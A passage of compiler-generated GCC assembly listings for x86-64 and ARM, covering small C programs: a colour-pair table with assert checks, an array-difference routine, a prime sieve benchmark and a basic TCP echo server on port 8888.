"Slate\000" .data .align 2 .type minorColor, %object .size minorColor, 20 minorColor: .word .LC5 .word .LC6 .word .LC7 .word .LC8 .word .LC9 .text .align 2 .global FormColorMap .syntax unified .arm .fpu softvfp .type FormColorMap, %function FormColorMap: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 mov r3, #0 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-12] b .L2 .L5: mov r3, #0 str r3, [fp, #-8] b .L3 .L4: ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r2, r2, r3 ldr r1, .L7 ldr r3, [fp, #-12] ldr r1, [r1, r3, lsl #2] ldr r0, .L7+4 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, r0, r3 str r1, [r3] ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r2, r2, r3 ldr r1, .L7+8 ldr r3, [fp, #-8] ldr r1, [r1, r3, lsl #2] ldr r0, .L7+4 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, r0, r3 add r3, r3, #4 str r1, [r3] ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L3: ldr r3, [fp, #-8] cmp r3, #4 ble .L4 ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L2: ldr r3, [fp, #-12] cmp r3, #4 ble .L5 ldr r3, [fp, #-12] ldr r2, [fp, #-8] mul r3, r2, r3 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L8: .align 2 .L7: .word majorColor .word ColorPairsTable .word minorColor .size FormColorMap, .-FormColorMap .section .rodata .align 2 .LC10: .ascii " %d | %s | %s\012\000" .align 2 .LC11: .ascii "%d | %s | %s\012\000" .text .align 2 .global printColorMap .syntax unified .arm .fpu softvfp .type printColorMap, %function printColorMap: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r3, #0 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-12] b .L10 .L15: mov r3, #0 str r3, [fp, #-8] b .L11 .L14: ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r3, r2, r3 cmp r3, #8 bgt .L12 ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r3, r2, r3 add r1, r3, #1 ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r2, r2, r3 ldr r0, .L17 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, r0, r3 ldr r0, [r3] ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r2, r2, r3 ldr ip, .L17 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, ip, r3 add r3, r3, #4 ldr r3, [r3] mov r2, r0 ldr r0, .L17+4 bl printf b .L13 .L12: ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r3, r2, r3 add r1, r3, #1 ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r2, r2, r3 ldr r0, .L17 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, r0, r3 ldr r0, [r3] ldr r2, [fp, #-12] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-8] add r2, r2, r3 ldr ip, .L17 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, ip, r3 add r3, r3, #4 ldr r3, [r3] mov r2, r0 ldr r0, .L17+8 bl printf .L13: ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L11: ldr r3, [fp, #-8] cmp r3, #4 ble .L14 ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L10: ldr r3, [fp, #-12] cmp r3, #4 ble .L15 ldr r3, [fp, #-12] ldr r2, [fp, #-8] mul r3, r2, r3 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L18: .align 2 .L17: .word ColorPairsTable .word .LC10 .word .LC11 .size printColorMap, .-printColorMap .section .rodata .align 2 .LC12: .ascii "the_stack_data/106500.c\000" .align 2 .LC13: .ascii "totalItems == 25\000" .align 2 .LC14: .ascii "result == 25\000" .align 2 .LC15: .ascii "ColorPairsTable[0][0] == majorColor[0]\000" .align 2 .LC16: .ascii "Misaligned_Pairs == 0\000" .align 2 .LC17: .ascii "All is well (maybe!)\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 bl FormColorMap str r0, [fp, #-12] bl printColorMap str r0, [fp, #-8] mov r3, #0 str r3, [fp, #-24] mov r3, #0 str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-16] mov r3, #0 str r3, [fp, #-20] b .L20 .L24: mov r3, #0 str r3, [fp, #-16] b .L21 .L23: ldr r2, [fp, #-20] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-16] add r2, r2, r3 ldr r1, .L30 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, r1, r3 ldr r2, [r3] ldr r1, .L30+4 ldr r3, [fp, #-20] ldr r3, [r1, r3, lsl #2] cmp r2, r3 beq .L22 ldr r2, [fp, #-20] mov r3, r2 lsl r3, r3, #2 add r2, r3, r2 ldr r3, [fp, #-16] add r2, r2, r3 ldr r1, .L30 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 add r3, r1, r3 add r3, r3, #4 ldr r2, [r3] ldr r1, .L30+8 ldr r3, [fp, #-16] ldr r3, [r1, r3, lsl #2] cmp r2, r3 bne .L22 ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L22: ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L21: ldr r3, [fp, #-16] cmp r3, #4 ble .L23 ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L20: ldr r3, [fp, #-20] cmp r3, #4 ble .L24 ldr r3, [fp, #-12] cmp r3, #25 beq .L25 ldr r3, .L30+12 mov r2, #46 ldr r1, .L30+16 ldr r0, .L30+20 bl __assert_fail .L25: ldr r3, [fp, #-8] cmp r3, #25 beq .L26 ldr r3, .L30+12 mov r2, #47 ldr r1, .L30+16 ldr r0, .L30+24 bl __assert_fail .L26: ldr r3, .L30 ldr r2, [r3] ldr r3, .L30+4 ldr r3, [r3] cmp r2, r3 beq .L27 ldr r3, .L30+12 mov r2, #48 ldr r1, .L30+16 ldr r0, .L30+28 bl __assert_fail .L27: ldr r3, [fp, #-24] cmp r3, #0 beq .L28 ldr r3, .L30+12 mov r2, #49 ldr r1, .L30+16 ldr r0, .L30+32 bl __assert_fail .L28: ldr r0, .L30+36 bl puts mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L31: .align 2 .L30: .word ColorPairsTable .word majorColor .word minorColor .word __PRETTY_FUNCTION__.4648 .word .LC12 .word .LC13 .word .LC14 .word .LC15 .word .LC16 .word .LC17 .size main, .-main .section .rodata .align 2 .type __PRETTY_FUNCTION__.4648, %object .size __PRETTY_FUNCTION__.4648, 5 __PRETTY_FUNCTION__.4648: .ascii "main\000" .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "449059.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d" .LC1: .string "%d " .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 add rsp, -128 mov DWORD PTR -116[rbp], edi mov QWORD PTR -128[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -112[rbp], 0 jmp .L2 .L3: lea rdx, -96[rbp] mov eax, DWORD PTR -112[rbp] cdqe sal rax, 2 add rax, rdx mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -112[rbp], 1 .L2: cmp DWORD PTR -112[rbp], 4 jle .L3 mov DWORD PTR -108[rbp], 0 jmp .L4 .L5: lea rdx, -64[rbp] mov eax, DWORD PTR -108[rbp] cdqe sal rax, 2 add rax, rdx mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -108[rbp], 1 .L4: cmp DWORD PTR -108[rbp], 4 jle .L5 mov DWORD PTR -104[rbp], 0 jmp .L6 .L7: mov eax, DWORD PTR -104[rbp] cdqe mov edx, DWORD PTR -96[rbp+rax*4] mov eax, DWORD PTR -104[rbp] cdqe mov eax, DWORD PTR -64[rbp+rax*4] sub edx, eax mov eax, DWORD PTR -104[rbp] cdqe mov DWORD PTR -32[rbp+rax*4], edx add DWORD PTR -104[rbp], 1 .L6: cmp DWORD PTR -104[rbp], 4 jle .L7 mov DWORD PTR -100[rbp], 0 jmp .L8 .L9: mov eax, DWORD PTR -100[rbp] cdqe mov eax, DWORD PTR -32[rbp+rax*4] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT add DWORD PTR -100[rbp], 1 .L8: cmp DWORD PTR -100[rbp], 4 jle .L9 mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L11 call __stack_chk_fail@PLT .L11: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "449059.c" .text .section .rodata .align 2 .LC0: .ascii "%d\000" .align 2 .LC1: .ascii "%d \000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 88 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #88 str r0, [fp, #-88] str r1, [fp, #-92] ldr r3, .L12 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #0 str r3, [fp, #-84] b .L2 .L3: sub r2, fp, #68 ldr r3, [fp, #-84] lsl r3, r3, #2 add r3, r2, r3 mov r1, r3 ldr r0, .L12+4 bl __isoc99_scanf ldr r3, [fp, #-84] add r3, r3, #1 str r3, [fp, #-84] .L2: ldr r3, [fp, #-84] cmp r3, #4 ble .L3 mov r3, #0 str r3, [fp, #-80] b .L4 .L5: sub r2, fp, #48 ldr r3, [fp, #-80] lsl r3, r3, #2 add r3, r2, r3 mov r1, r3 ldr r0, .L12+4 bl __isoc99_scanf ldr r3, [fp, #-80] add r3, r3, #1 str r3, [fp, #-80] .L4: ldr r3, [fp, #-80] cmp r3, #4 ble .L5 mov r3, #0 str r3, [fp, #-76] b .L6 .L7: ldr r3, [fp, #-76] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r2, [r3, #-64] ldr r3, [fp, #-76] lsl r3, r3, #2 sub r1, fp, #4 add r3, r1, r3 ldr r3, [r3, #-44] sub r2, r2, r3 ldr r3, [fp, #-76] lsl r3, r3, #2 sub r1, fp, #4 add r3, r1, r3 str r2, [r3, #-24] ldr r3, [fp, #-76] add r3, r3, #1 str r3, [fp, #-76] .L6: ldr r3, [fp, #-76] cmp r3, #4 ble .L7 mov r3, #0 str r3, [fp, #-72] b .L8 .L9: ldr r3, [fp, #-72] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r3, [r3, #-24] mov r1, r3 ldr r0, .L12+8 bl printf ldr r3, [fp, #-72] add r3, r3, #1 str r3, [fp, #-72] .L8: ldr r3, [fp, #-72] cmp r3, #4 ble .L9 mov r3, #0 ldr r2, .L12 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L11 bl __stack_chk_fail .L11: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L13: .align 2 .L12: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "557759.c" .intel_syntax noprefix .text .globl sieve .type sieve, @function sieve: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 lea r11, -815104[rsp] .LPSRL0: sub rsp, 4096 or DWORD PTR [rsp], 0 cmp rsp, r11 jne .LPSRL0 sub rsp, 3968 mov DWORD PTR -819060[rbp], edi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov QWORD PTR -819024[rbp], 0 jmp .L2 .L10: mov QWORD PTR -819032[rbp], 0 mov QWORD PTR -819048[rbp], 0 jmp .L3 .L4: lea rdx, -819008[rbp] mov rax, QWORD PTR -819048[rbp] add rax, rdx mov BYTE PTR [rax], 1 add QWORD PTR -819048[rbp], 1 .L3: cmp QWORD PTR -819048[rbp], 818999 jle .L4 mov QWORD PTR -819048[rbp], 2 jmp .L5 .L9: lea rdx, -819008[rbp] mov rax, QWORD PTR -819048[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L6 mov rax, QWORD PTR -819048[rbp] add rax, 1 mov QWORD PTR -819016[rbp], rax mov rdx, QWORD PTR -819048[rbp] mov rax, QWORD PTR -819016[rbp] add rax, rdx mov QWORD PTR -819040[rbp], rax jmp .L7 .L8: lea rdx, -819008[rbp] mov rax, QWORD PTR -819040[rbp] add rax, rdx mov BYTE PTR [rax], 0 mov rax, QWORD PTR -819016[rbp] add QWORD PTR -819040[rbp], rax .L7: cmp QWORD PTR -819040[rbp], 818999 jle .L8 add QWORD PTR -819032[rbp], 1 .L6: add QWORD PTR -819048[rbp], 1 .L5: cmp QWORD PTR -819048[rbp], 818999 jle .L9 add QWORD PTR -819024[rbp], 1 .L2: mov eax, DWORD PTR -819060[rbp] cdqe cmp QWORD PTR -819024[rbp], rax jl .L10 mov rax, QWORD PTR -819032[rbp] mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L12 call __stack_chk_fail@PLT .L12: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size sieve, .-sieve .section .rodata .align 8 .LC0: .string "%d iterations of sieve for %d: result = %d\n" .text .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov edi, 1000 call sieve mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] mov ecx, eax mov edx, 819000 mov esi, 1000 lea rdi, .LC0[rip] mov eax, 0 call printf@PLT cmp DWORD PTR -4[rbp], 65333 je .L14 call abort@PLT .L14: mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "557759.c" .text .section .rodata .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global sieve .syntax unified .arm .fpu softvfp .type sieve, %function sieve: @ args = 0, pretend = 0, frame = 819032 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #815104 sub sp, sp, #3920 sub sp, sp, #8 sub r3, fp, #815104 sub r3, r3, #4 str r0, [r3, #-3924] ldr r3, .L13 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 mov r3, #0 str r3, [r2, #-3908] b .L2 .L10: sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 mov r3, #0 str r3, [r2, #-3912] sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 mov r3, #0 str r3, [r2, #-3920] b .L3 .L4: sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] add r3, r2, r3 sub r3, r3, #3888 sub r3, r3, #12 mov r2, #1 strb r2, [r3] sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] add r3, r3, #1 str r3, [r2, #-3920] .L3: sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] ldr r2, .L13+4 cmp r3, r2 ble .L4 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 mov r3, #2 str r3, [r2, #-3920] b .L5 .L9: sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] add r3, r2, r3 sub r3, r3, #3888 sub r3, r3, #12 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L6 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] add r3, r3, #1 str r3, [r2, #-3904] sub r3, fp, #815104 sub r3, r3, #4 mov r1, r3 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r2, [r2, #-3920] ldr r3, [r3, #-3904] add r3, r2, r3 str r3, [r1, #-3916] b .L7 .L8: sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3916] add r3, r2, r3 sub r3, r3, #3888 sub r3, r3, #12 mov r2, #0 strb r2, [r3] sub r3, fp, #815104 sub r3, r3, #4 mov r1, r3 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r2, [r2, #-3916] ldr r3, [r3, #-3904] add r3, r2, r3 str r3, [r1, #-3916] .L7: sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3916] ldr r2, .L13+4 cmp r3, r2 ble .L8 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3912] add r3, r3, #1 str r3, [r2, #-3912] .L6: sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] add r3, r3, #1 str r3, [r2, #-3920] .L5: sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3920] ldr r2, .L13+4 cmp r3, r2 ble .L9 sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3908] add r3, r3, #1 str r3, [r2, #-3908] .L2: sub r3, fp, #815104 sub r3, r3, #4 mov r2, r3 sub r3, fp, #815104 sub r3, r3, #4 ldr r2, [r2, #-3908] ldr r3, [r3, #-3924] cmp r2, r3 blt .L10 sub r3, fp, #815104 sub r3, r3, #4 ldr r3, [r3, #-3912] ldr r2, .L13 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L12 bl __stack_chk_fail .L12: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L14: .align 2 .L13: .word .LC0 .word 818999 .size sieve, .-sieve .section .rodata .align 2 .LC1: .ascii "%d iterations of sieve for %d: result = %d\012\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r0, #1000 bl sieve str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r2, .L18 mov r1, #1000 ldr r0, .L18+4 bl printf ldr r3, [fp, #-8] ldr r2, .L18+8 cmp r3, r2 beq .L16 bl abort .L16: mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L19: .align 2 .L18: .word 819000 .word .LC1 .word 65333 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "164428.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "socket" .LC1: .string "bind" .LC2: .string "accept" .LC3: .string "Accept client %s\n" .LC4: .string "Welcome to my server\n" .LC5: .string "write" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 4096 or QWORD PTR [rsp], 0 sub rsp, 80 mov DWORD PTR -4164[rbp], edi mov QWORD PTR -4176[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, -4144[rbp] mov edx, 16 mov esi, 0 mov rdi, rax call memset@PLT mov WORD PTR -4144[rbp], 2 mov DWORD PTR -4140[rbp], 0 mov edi, 8888 call htons@PLT mov WORD PTR -4142[rbp], ax mov edx, 0 mov esi, 1 mov edi, 2 call socket@PLT mov DWORD PTR -4156[rbp], eax cmp DWORD PTR -4156[rbp], 0 jns .L2 lea rdi, .LC0[rip] call perror@PLT mov eax, 1 jmp .L8 .L2: lea rcx, -4144[rbp] mov eax, DWORD PTR -4156[rbp] mov edx, 16 mov rsi, rcx mov edi, eax call bind@PLT test eax, eax jns .L4 lea rdi, .LC1[rip] call perror@PLT mov eax, 1 jmp .L8 .L4: mov eax, DWORD PTR -4156[rbp] mov esi, 5 mov edi, eax call listen@PLT mov DWORD PTR -4160[rbp], 16 lea rdx, -4160[rbp] lea rcx, -4128[rbp] mov eax, DWORD PTR -4156[rbp] mov rsi, rcx mov edi, eax call accept@PLT mov DWORD PTR -4152[rbp], eax cmp DWORD PTR -4152[rbp], 0 jns .L5 lea rdi, .LC2[rip] call perror@PLT mov eax, 1 jmp .L8 .L5: mov eax, DWORD PTR -4124[rbp] mov edi, eax call inet_ntoa@PLT mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR -4152[rbp] mov ecx, 0 mov edx, 21 lea rsi, .LC4[rip] mov edi, eax call send@PLT mov DWORD PTR -4148[rbp], eax jmp .L6 .L7: mov eax, DWORD PTR -4148[rbp] cdqe mov BYTE PTR -4112[rbp+rax], 0 lea rax, -4112[rbp] mov rdi, rax call puts@PLT mov eax, DWORD PTR -4148[rbp] movsx rdx, eax lea rsi, -4112[rbp] mov eax, DWORD PTR -4152[rbp] mov ecx, 0 mov edi, eax call send@PLT test rax, rax jns .L6 lea rdi, .LC5[rip] call perror@PLT mov eax, 1 jmp .L8 .L6: lea rsi, -4112[rbp] mov eax, DWORD PTR -4152[rbp] mov ecx, 0 mov edx, 4096 mov edi, eax call recv@PLT mov DWORD PTR -4148[rbp], eax cmp DWORD PTR -4148[rbp], 0 jg .L7 mov eax, DWORD PTR -4152[rbp] mov edi, eax call close@PLT mov eax, DWORD PTR -4156[rbp] mov edi, eax call close@PLT mov eax, 0 .L8: mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L9 call __stack_chk_fail@PLT .L9: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "164428.c" .text .section .rodata .align 2 .LC0: .ascii "socket\000" .align 2 .LC1: .ascii "bind\000" .align 2 .LC2: .ascii "accept\000" .align 2 .LC3: .ascii "Accept client %s\012\000" .align 2 .LC4: .ascii "Welcome to my server\012\000" .align 2 .LC5: .ascii "write\000" .align 2 .LC6: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 4160 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #4160 sub sp, sp, #4 sub r3, fp, #4096 sub r3, r3, #12 str r0, [r3, #-60] sub r3, fp, #4096 sub r3, r3, #12 str r1, [r3, #-64] ldr r3, .L10 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 sub r3, fp, #4096 sub r3, r3, #12 sub r3, r3, #36 mov r2, #16 mov r1, #0 mov r0, r3 bl memset sub r3, fp, #4096 sub r3, r3, #12 mov r2, #2 strh r2, [r3, #-36] @ movhi sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 mov r3, #0 str r3, [r2, #-32] ldr r0, .L10+4 bl htons mov r3, r0 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 strh r2, [r3, #-34] @ movhi sub r3, fp, #4096 sub r3, r3, #12 mov r4, r3 mov r2, #0 mov r1, #1 mov r0, #2 bl socket str r0, [r4, #-48] sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-48] cmp r3, #0 bge .L2 ldr r0, .L10+8 bl perror mov r3, #1 b .L8 .L2: sub r3, fp, #4096 sub r3, r3, #12 sub r3, r3, #36 sub r2, fp, #4096 sub r2, r2, #12 mov r0, r2 mov r2, #16 mov r1, r3 ldr r0, [r0, #-48] bl bind mov r3, r0 cmp r3, #0 bge .L4 ldr r0, .L10+12 bl perror mov r3, #1 b .L8 .L4: sub r3, fp, #4096 sub r3, r3, #12 mov r1, #5 ldr r0, [r3, #-48] bl listen sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 mov r3, #16 str r3, [r2, #-52] sub r3, fp, #4096 sub r3, r3, #12 mov r4, r3 sub r2, fp, #4096 sub r2, r2, #12 sub r2, r2, #52 sub r3, fp, #4096 sub r3, r3, #12 sub r3, r3, #20 sub r1, fp, #4096 sub r1, r1, #12 mov r0, r1 mov r1, r3 ldr r0, [r0, #-48] bl accept str r0, [r4, #-44] sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-44] cmp r3, #0 bge .L5 ldr r0, .L10+16 bl perror mov r3, #1 b .L8 .L5: sub r3, fp, #4096 sub r3, r3, #12 ldr r0, [r3, #-16] bl inet_ntoa mov r3, r0 mov r1, r3 ldr r0, .L10+20 bl printf sub r3, fp, #4096 sub r3, r3, #12 mov r4, r3 sub r3, fp, #4096 sub r3, r3, #12 mov r0, r3 mov r3, #0 mov r2, #21 ldr r1, .L10+24 ldr r0, [r0, #-44] bl send str r0, [r4, #-40] b .L6 .L7: sub r3, fp, #4096 sub r3, r3, #12 mov r2, r3 sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-40] add r3, r2, r3 sub r3, r3, #4 mov r2, #0 strb r2, [r3] sub r3, fp, #4096 sub r3, r3, #12 sub r3, r3, #4 mov r0, r3 bl puts sub r3, fp, #4096 sub r3, r3, #12 ldr r2, [r3, #-40] sub r1, fp, #4096 sub r1, r1, #12 sub r1, r1, #4 sub r3, fp, #4096 sub r3, r3, #12 mov r0, r3 mov r3, #0 ldr r0, [r0, #-44] bl send mov r3, r0 cmp r3, #0 bge .L6 ldr r0, .L10+28 bl perror mov r3, #1 b .L8 .L6: sub r3, fp, #4096 sub r3, r3, #12 mov r4, r3 sub r1, fp, #4096 sub r1, r1, #12 sub r1, r1, #4 sub r3, fp, #4096 sub r3, r3, #12 mov r0, r3 mov r3, #0 mov r2, #4096 ldr r0, [r0, #-44] bl recv str r0, [r4, #-40] sub r3, fp, #4096 sub r3, r3, #12 ldr r3, [r3, #-40] cmp r3, #0 bgt .L7 sub r3, fp, #4096 sub r3, r3, #12 ldr r0, [r3, #-44] bl close sub r3, fp, #4096 sub r3, r3, #12 ldr r0, [r3, #-48] bl close mov r3, #0 .L8: ldr r2, .L10 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L9 bl __stack_chk_fail .L9: 